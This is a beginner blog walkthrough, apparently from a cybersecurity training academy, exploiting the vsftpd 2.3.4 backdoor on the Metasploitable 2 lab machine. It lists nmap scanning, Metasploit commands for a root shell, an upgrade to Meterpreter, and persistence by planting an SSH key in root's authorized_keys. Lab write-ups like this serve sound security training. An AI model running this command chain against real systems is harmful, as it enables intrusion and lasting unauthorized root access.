Contact us

Blogs

Vsftpd 2.3.4 Exploitation — Metasploitable 2

Topics covered

—Enumeration using Nmap

— Getting shell access

— converting Normal shell to Meterpreter,

— Persistance access.

Hi Guys I’m rohan patil this is my 1st article on penetration testing. you can download metasploitable 2 from the here. I am glade to have mentor like Vishal Waghmare  medium link

I have downloaded and configured metasploitable 2 on my system. About metasploitable you can get the info here.

lets Start…

To get the IP used

Netdiscover

After getting IP, NMAP command executed to know the services and the ports configured on victim machine and save the information in abc.xml file.

nmap -sS 192.168.0.111 -v -p 1–65535 -sV -O -oX abc.xml

Got the NMap info for the victim machine with Port No., current state of the services, Name of the services, Versions of the services.and OS details at the bottom.

Search for the exploit VSFTPD 2.3.4 on exploit-db.com and got the backdoor command execution exploit.

To execute backdoor command execution started

msfconsole -q

In msfconsole searched for “vsftpd” with command

search vsftpd

To execute the search used command “use 0” 0 stand for the exploit number which msf is having. Also ask to show the options available.

use 0

As we can see the rhost is blank means we have to set the rhosts to execute the exploit. Rhosts is the receiving host(victim machine IP address)

set rhosts 192.168.0.111

Run the exploit “run”. Exploit executed successfully as we found the shell.

run

As our exploit executed successfully and we have got the ROOT access.

Now lets convert normal shell access to Meterpreter. To do so we have to send the shell to run in background

background

Let search for meterpreter

search shell_to

Now we will going to repeat the commands we have used for vsftpd.

options

set Lhost 192.168.0.100

set session 1

run

After setting up the meterpreter we search for the sessions. their should be 2 sessions running.

show sessions

to use the sessions we will use command “sessions 1 or 2”

sessions 2

I am using 2 as i want to use meterpreter access. And “help” command will show you the number of command we can execute on victim machine.

To have long time access I am inserting ssh key in victim machine so that I can get ssh access without running msfconsole.

First I will generate ssh public key for my login. then I am going to copy the same to insert it in victim machine.

ssh-keygen

cat /home/spider/.ssh/id_rsa.pub

in shell we will go to .ssh folder by command

cd /root/.ssh

and edit the file authorized_keys

echo -e “ ssh key” >> authorized_keys

now check the access command

ssh root@192.168.0.111

admin

admin

Share on:

Facebook Youtube Linkedin Instagram

Leave a Reply

Your email address will not be published. Required fields are marked *





    Please prove you are human by selecting the house.

    You Can Be Your Own

    Guiding Star With Our Help

    ENROLL NOW

    Vinca Academy is a leading Cyber Security training institute offering Industry curated Certification courses leading to Job Placements.

    Facebook Linkedin Youtube Instagram

    Company

    Platforms

    Subscribe

      Get the latest news and updates right at your inbox.